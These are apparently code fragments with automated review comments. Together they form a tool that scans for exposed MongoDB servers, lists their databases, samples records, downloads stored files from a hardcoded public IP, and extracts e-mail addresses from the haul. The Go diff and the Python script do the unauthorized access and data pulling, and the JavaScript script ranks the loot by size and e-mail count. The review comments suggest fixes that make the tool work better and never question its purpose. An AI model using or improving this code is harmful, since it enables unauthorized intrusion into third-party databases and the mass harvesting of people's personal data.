import ntpath
import re
from io import BytesIO
import gridfs
import pymongo as pym
from pandas import ExcelFile
def connectToDb():
client = pym.MongoClient('mongodb://14.143.82.24:27017/')
db = client.SMSSvatantra_Live
collectn = db.SMSSvatantra_Live
fs = gridfs.GridFS(db)
return db, collectn, fs
db, collectn, fs = connectToDb()
if __name__ == "__main__":
for file in db.fs.files.find({}, {"_id": 1, "filename": 1}):
filename = ntpath.basename(file["filename"])
print(filename)
if filename.endswith(".xls") or filename.endswith(".csv"):
print("Downloading ." + filename)
to_write = False
fobj = fs.get(file["_id"])
buff = fobj.read()
excel_data = ExcelFile(BytesIO(buff))
df = excel_data.parse(excel_data.sheet_names[-1])
csv = df.to_csv()
emails = re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", csv)
if len(emails):
print(emails)
to_write = True
if to_write:
f = open("./data/" + filename, 'wb')
f.write(buff)
f.close()
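Review bot: The `pym.MongoClient('mongodb://14.143.82.24:27017/')` line in `connectToDb` commits a literal public host address and a database name to the repository, and `db, collectn, fs = connectToDb()` sits outside the `__main__` guard, so merely importing the module opens that connection. Read the URI from configuration instead, for example `pym.MongoClient(os.environ["MONGO_URI"])` (the variable name is only an illustration, and it needs `import os`), and move the call under the guard. The files written to `./data/` are kept precisely because they matched the e-mail regex, so that directory holds personal data in clear text and should have restricted permissions and a retention rule. The write itself should be `with open("./data/" + filename, 'wb') as f:` so the handle is closed even if `f.write(buff)` raises.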
const MongoClient = require('mongodb').MongoClient;
const url = "mongodb://localhost:27017/tik";
MongoClient.connect(url, (err, client) => {
if (err) throw err;
const db = client.db("tik");
const collection = db.collection("mongohunter");
collection.find({}).sort({"totalSize": -1}).toArray((err, result) => {
result.forEach(doc => {
let colls = Object.keys(doc["collections"]);
if (colls.length === 0) return;
const size = (doc["totalSize"] / (1024 * 1024 * 1024));
if (size < 1) return;
;
console.log("> " + doc["_id"]);
console.log("> Size : " + (size) + " GB");
Object.keys(doc["collections"]).forEach(k => {
let info = doc["collections"][k];
let emails = JSON.stringify(info).match(/([a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9._-]+)/gi);
if (emails && emails.length && info["count"] > 1000) {
console.log(k, info["count"], emails);
}
});
// console.log(colls);
console.log("------------------------------------------------------------------------\n")
})
});
});
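Review bot: The inner `toArray((err, result) => {` callback never looks at `err`, so a failed query reaches `result.forEach` with `result` undefined and dies with a TypeError instead of reporting the driver error. Add `if (err) throw err;` as its first line, as the outer `connect` callback already does. Nothing in the section calls `client.close()`, so the process presumably keeps the connection open after the report has been printed. `console.log(k, info["count"], emails)` writes addresses taken from the stored samples straight to stdout, so any log or redirected file that captures this output ends up holding them; printing `emails.length` would give the same triage signal.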
......@@ -77,24 +77,24 @@ func workDispatcher(ipAddr chan string, data chan string) {
}
}
var client *mongo.Client = nil;
var client *mongo.Client = nil
func getClient() (*mongo.Client) {
if (client == nil) {
func getClient() *mongo.Client {
if client == nil {
var err error
ctx, _ := context.WithTimeout(context.Background(), 10*time.Second)
client, err = mongo.Connect(ctx, options.Client().ApplyURI("mongodb://localhost:27017"))
if err != nil {
return nil;
return nil
}
println("Created new connection...")
// Check the connection
err = client.Ping(context.TODO(), nil)
return client;
return client
} else {
return client;
return client
}
}
......@@ -112,22 +112,65 @@ func testIP(input string, data chan string) {
//If we can list databases , we can read records to!
dbs, err := client.ListDatabases(context.TODO(), bson.D{{}})
local := getClient()
collection := local.Database("tik").Collection("mongohunter")
if err != nil {
if *verbose {
print("\r\033[K" + input + ": ")
println(err.Error())
}
println("\r\033[K" + input + " is Open")
filter := bson.M{"_id": bson.M{"$eq": input}}
updateOp := options.UpdateOptions{}
updateOp.SetUpsert(true)
_, _ = collection.UpdateOne(context.Background(),
filter,
bson.D{
{"$set", bson.D{
{"_id", input},
{"updated", time.Now()},
}},
{"$setOnInsert", bson.D{
{"created", time.Now()},
}},
}, &updateOp)
} else {
local := getClient()
//var result = bson.D{}
println("\r\033[K" + input + " is VULNERABLE:")
fmt.Printf("%v", dbs)
println("\n")
var collections = bson.D{}
for _, db := range dbs.Databases {
d := client.Database(db.Name)
col, _ := d.ListCollectionNames(context.TODO(), bson.D{{}})
for _, collection := range col {
//count, _ := d.Collection(collection).EstimatedDocumentCount(context.TODO(), nil)
var stat bson.M
_ = d.RunCommand(context.Background(), bson.M{"collStats": collection}).Decode(&stat)
doc := &bson.D{}
_ = d.Collection(collection).FindOne(context.TODO(), bson.D{{}}).Decode(&doc)
var n = db.Name + "~" + collection
if n != "local~startup_log" {
collections = append(collections, bson.E{
n, bson.D{
{"count", stat["count"]},
{"avg", stat["avgObjSize"]},
{"storage", stat["storageSize"]},
{"sample", doc},
},
})
}
}
}
//for db := range dbs.Databases {
//
//
//}
collection := local.Database("tik").Collection("mongohunter")
filter := bson.M{"_id": bson.M{"$eq": input}}
updateOp := options.UpdateOptions{}
updateOp.SetUpsert(true)
......@@ -136,7 +179,8 @@ func testIP(input string, data chan string) {
bson.D{
{"$set", bson.D{
{"_id", input},
{"dbs", dbs.Databases},
//{"dbs", dbs.Databases},
{"collections", collections},
{"totalSize", dbs.TotalSize},
{"updated", time.Now()},
}},
......@@ -144,18 +188,14 @@ func testIP(input string, data chan string) {
{"created", time.Now()},
}},
}, &updateOp)
fmt.Println("Updated info about " + input)
if *outFile != "null" {
data <- input
}
if err != nil {
fmt.Print(err)
return
}
println("\r\033[K" + input + " is VULNERABLE:")
fmt.Printf("%v", dbs)
println("\n")
if *outFile != "null" {
data <- input
}
}
client.Disconnect(context.TODO())
return
......
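Review bot: In `getClient`, `ctx, _ := context.WithTimeout(...)` throws away the cancel function, and the result of `client.Ping` is assigned to `err` but never checked, so a client that cannot reach the local store is still returned and stays cached in the package-level variable. Keep the cancel with `ctx, cancel := context.WithTimeout(context.Background(), 10*time.Second)` followed by `defer cancel()`, and return nil when the ping fails. The lazy write to `client` is unsynchronised; if `testIP` runs on several goroutines, as the channels in `workDispatcher` suggest, this is a data race that `sync.Once` would remove. In the `testIP` hunks, database names, collection names and the `sample` document all come from the remote host and go unfiltered into `fmt.Printf("%v", dbs)` and into the local upsert, whose error is dropped with `_, _ =`; treat them as untrusted input by escaping control characters before printing (for example `%q` on the names) and checking the upsert error. `testIP` starts and ends outside the visible hunks.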